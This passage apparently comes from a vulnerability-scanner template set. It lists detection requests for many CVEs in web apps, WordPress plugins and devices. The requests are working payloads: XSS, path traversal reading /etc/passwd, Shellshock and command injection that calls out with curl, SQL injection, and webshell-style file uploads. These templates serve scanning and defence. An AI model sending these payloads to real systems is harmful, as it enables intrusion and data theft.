Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-3836","info":{"name":"Dahua Smart Park Management - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1\nContent-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nHost: {{Hostname}}\n\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{random_str}}.jsp\"\nContent-Type: application/octet-stream\nContent-Transfer-Encoding: binary\n\n{{match_str}}\n--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--\n","GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 200","contains(body_2, '{{match_str}}')"],"condition":"and"}],"extractors":[{"type":"regex","name":"shell_filename","internal":true,"part":"body_1","regex":["ico_res_(\\w+)_on\\.jsp"]}]}]},{"id":"CVE-2023-2130","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"Supplier Name\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-24243","info":{"name":"CData RSB Connect v22.0.8336 - Server Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%255c%255c{{interactsh-url}}%255cC$%255cbb"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-1177","info":{"name":"Mlflow <2.2.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n","GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35885","info":{"name":"Cloudpanel 2 < 2.3.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /file-manager/ HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\n","POST /file-manager/backend/makefile HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/&name={{str1}}.php\n","POST /file-manager/backend/text HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&content=<?php echo \"{{str2}}\"; ?>\n","POST /file-manager/backend/permissions HTTP/1.1\nHost: {{Hostname}}\nCookie: clp-fm={{session}}\nContent-Type: application/x-www-form-urlencoded\n\nid=/htdocs/app/files/public/{{str1}}.php&permissions=0777\n","GET /{{str1}}.php HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["body_5 == str2"]}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-22478","info":{"name":"KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access","severity":"high"},"requests":[{"raw":["@timeout 10\nPOST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"apiVersion\":","\"uuid\":","\"userName\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-23489","info":{"name":"WordPress Easy Digital Downloads 3.1.0.2/3.1.0.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/easy-digital-downloads/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(body_1, \"[]\") && contains(body_2, \"Easy Digital Downloads\")"],"condition":"and"}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30777","info":{"name":"Advanced Custom Fields < 6.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onanimationstart=alert(document.domain)//\")","contains(body_2, \"Advanced Custom Fields\")"],"condition":"and"}]}]},{"id":"CVE-2023-29922","info":{"name":"PowerJob V4.3.1 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["POST /user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"username\":\"{{str}}\",\"phone\":\"{{str}}\",\"email\":\"{{str}}\",\"webHook\":\"{{str}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"data\":null"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1434","info":{"name":"Odoo - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","\"params\":","session"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34599","info":{"name":"Gibbon v25.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8m88nqhR1NAnQEYZ\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"address\"\n\n\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"method\"\n\ndefault\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibbonSchoolYearID\"\n\n017\n------WebKitFormBoundary8m88nqhR1NAnQEYZ\nContent-Disposition: form-data; name=\"gibboni18nID\"\n\n0001\n------WebKitFormBoundary8m88nqhR1NAnQEYZ--\n","GET /index.php?q=/modules/Staff/staff_view_details.php&gibbonTTID=00000010&gibbonPersonID=0000000001&search=yyraq'><script>alert(document.domain)</script>oq7c8fmwwro&ttDate=05/23/2023&schoolCalendar=N&personalCalendar=N&spaceBookingCalendar=N&fromTT=Y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["><script>alert(document.domain)</script>","gibbon"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33510","info":{"name":"Jeecg P3 Biz Chat - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chat/imController/showOrDownByurl.do?dbPath=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24278","info":{"name":"Squidex <7.4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","looking for!"],"condition":"and"},{"type":"word","part":"header","words":["image/svg+xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35843","info":{"name":"NocoDB version <= 0.106.1 - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36346","info":{"name":"POS Codekop v2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.location)</script>","<title>print</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25157","info":{"name":"GeoServer OGC Filter - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities HTTP/1.1\nHost: {{Hostname}}\n","GET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&maxFeatures=50&outputFormat=csv HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /geoserver/ows?service=WFS&version=1.0.0&request=GetFeature&typeName={{name}}&CQL_FILTER=strStartswith({{column}},%27%27%27%27)=true HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"iterate-all":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["SQL SELECT"]},{"type":"word","part":"header_3","words":["text/xml"]}],"extractors":[{"type":"regex","name":"name","group":1,"regex":["<FeatureType><Name>(.*?)<\\/Name><Title>"],"internal":true,"part":"body_1"},{"type":"regex","name":"column","group":1,"regex":["FID,([aA-zZ_]+),"],"internal":true,"part":"body_2"}]}]},{"id":"CVE-2023-3345","info":{"name":"LMS by Masteriyo < 1.6.8 - Information Exposure","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/masteriyo/v1/users/ HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: 